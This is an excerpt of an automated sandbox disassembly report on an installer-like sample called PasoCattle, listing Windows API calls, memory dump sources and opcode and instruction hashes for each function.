                                                                                                                                                                        • Opcode Fuzzy Hash: 5e7bfe574d04e9302ce96a75028483347f8e754cab2f6e4722de83d8c32547a7
                                                                                                                                                                        • Instruction Fuzzy Hash: B6018872B042509FF7119BB4BC4ABAA7BE4A715315F504436F141F61E3CA7D4411C72D
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 00406EFE: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,00000009), ref: 00407265
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,Version ), ref: 00407276
                                                                                                                                                                        • lstrcpynW.KERNEL32(?,?,?), ref: 0040728D
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrcpyn$CreateFilelstrcmp
                                                                                                                                                                        • String ID: Version
                                                                                                                                                                        • API String ID: 512980652-315105994
                                                                                                                                                                        • Opcode ID: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                        • Instruction ID: f6016284c167eb8c93e4c4d2cd91337f160ffdcdaea293fd9af5b6974d265005
                                                                                                                                                                        • Opcode Fuzzy Hash: e08784de301d9fe6ca80962c3bdf8726d1c794b972164068317a4e691a2db981
                                                                                                                                                                        • Instruction Fuzzy Hash: 74F08172A0021CBBDF109BA5DD45EEA777CAB44700F000076F600F6191E2B5AE148BA1
                                                                                                                                                                        APIs
                                                                                                                                                                        • DestroyWindow.USER32(00000000,00000000,0040372F,00000001,?,?,?,00000000,00403A73,?), ref: 004032E5
                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00403303
                                                                                                                                                                        • CreateDialogParamW.USER32(0000006F,00000000,0040324C,00000000), ref: 00403320
                                                                                                                                                                        • ShowWindow.USER32(00000000,00000005,?,?,?,00000000,00403A73,?), ref: 0040332E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2102729457-0
                                                                                                                                                                        • Opcode ID: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                        • Instruction ID: 7080548a0c715e844c944b711630a30770084a0de0adb1936a850f0acfbe0ad2
                                                                                                                                                                        • Opcode Fuzzy Hash: 20fc2252fa4e8cade60f22cfb8dff2eb59aca0eba7377cdae62c8c9885b14618
                                                                                                                                                                        • Instruction Fuzzy Hash: 76F05E30541220BBC620AF24FD89AAF7F68B705B1274008BAF405B11A6C7384D92CFDC
                                                                                                                                                                        APIs
                                                                                                                                                                        • GlobalAlloc.KERNEL32(00000040,00002004,00000000,?,?,00402449,?,?,?,00000008,00000001,000000F0), ref: 0040639C
                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00002004,00000000,00000000,?,?,00402449,?,?,?,00000008,00000001), ref: 004063B2
                                                                                                                                                                        • GetProcAddress.KERNEL32(?,00000000), ref: 004063C1
                                                                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004063CA
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Global$AddressAllocByteCharFreeMultiProcWide
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2883127279-0
                                                                                                                                                                        • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                        • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                        • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                        • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                        APIs
                                                                                                                                                                        • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                        • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                          • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                                                                                        • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                        • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                        • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                        • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                        • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                        • String ID: !N~
                                                                                                                                                                        • API String ID: 623250636-529124213
                                                                                                                                                                        • Opcode ID: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                        • Instruction ID: 1025b72e91f13a3121db677028adcce723ab2f3f19a12cbdb86f5280e69f3e4e
                                                                                                                                                                        • Opcode Fuzzy Hash: 07e0e1e700d966a463b53d73ca6f39700f71f89c173b529fa76a4fed3a8722df
                                                                                                                                                                        • Instruction Fuzzy Hash: 14E0C0716002086AEB01ABA1DD89DAE7BACAB45304F144426F601F71E3E6745D028714
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                        Strings
                                                                                                                                                                        • Error launching installer, xrefs: 00405C74
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                                                                                        • String ID: Error launching installer
                                                                                                                                                                        • API String ID: 3712363035-66219284
                                                                                                                                                                        • Opcode ID: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                        • Instruction ID: 058e85fc593d498414a6a643ff83d14e048665682532f700ab3f6144ed6d8858
                                                                                                                                                                        • Opcode Fuzzy Hash: d7e07479a26add6e139fb42e4e519ed4ce81f94bdda572b5be1add7e8fe8fde5
                                                                                                                                                                        • Instruction Fuzzy Hash: A4E0ECB0900209AFEB009F65DD09E7B7BBCEB00384F084426AD10E2161E778D8148B69
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                        • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                        • API String ID: 3509786178-2769509956
                                                                                                                                                                        • Opcode ID: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction ID: 2c5812d3804eb93f93713fa8b891b4ce654538dc852139f9e16b4ff69120e8c2
                                                                                                                                                                        • Opcode Fuzzy Hash: db8d081d013b9790c932ab277b4a3a99312fd955ab88a80e97be1a4fe9473cae
                                                                                                                                                                        • Instruction Fuzzy Hash: 93D05E34A50206BADA009FE1FE29E597764AB84304F400869F005890B1EA74C4108B0E
                                                                                                                                                                        APIs
                                                                                                                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                        • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                        • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.1719603114.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.1719589308.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719617822.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719632720.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        • Associated: 00000001.00000002.1719752525.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_PasoCattle.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 190613189-0
                                                                                                                                                                        • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                        • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                        • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4